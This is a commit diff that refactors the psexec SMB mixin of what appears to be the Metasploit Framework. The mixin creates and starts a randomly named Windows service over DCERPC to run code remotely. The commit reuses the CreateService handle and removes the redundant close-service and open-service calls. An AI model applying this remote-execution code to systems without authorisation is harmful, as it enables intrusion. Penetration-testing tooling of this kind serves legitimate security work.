Re-use CreateService Handle

and remove unused variable
2014-03-06 21:37:49 +00:00 · 2014-03-06 21:37:49 +00:00 · 311d4665ce
parent 5606958320
commit 311d4665ce
1 changed files with 2 additions and 18 deletions
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@ -72,7 +72,6 @@ module Exploit::Remote::SMB::Psexec
    end
    servicename = Rex::Text.rand_text_alpha(11)
    displayname = Rex::Text.rand_text_alpha(16)
-    holdhandle = scm_handle
    svc_handle = nil
    svc_status = nil
    stubdata =
@ -93,29 +92,14 @@ module Exploit::Remote::SMB::Psexec
      vprint_status("#{peer} - Creating the service...")
      response = dcerpc.call(0x0c, stubdata)
      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
-        svc_handle = dcerpc.last_response.stub_data[0,20]
+        svc_handle = dcerpc.last_response.stub_data[4,20]
        svc_status = dcerpc.last_response.stub_data[24,4]
      end
    rescue ::Exception => e
      print_error("#{peer} - Error creating service: #{e}")
      return false
    end
-    vprint_status("#{peer} - Closing service handle...")
-    begin
-      response = dcerpc.call(0x0, svc_handle)
-    rescue ::Exception
-    end
-    vprint_status("#{peer} - Opening service...")
-    begin
-      stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
-      response = dcerpc.call(0x10, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
-        svc_handle = dcerpc.last_response.stub_data[0,20]
-      end
-    rescue ::Exception => e
-      print_error("#{peer} - Error opening service: #{e}")
-      return false
-    end
+
    vprint_status("#{peer} - Starting the service...")
    stubdata = svc_handle + NDR.long(0) + NDR.long(0)
    begin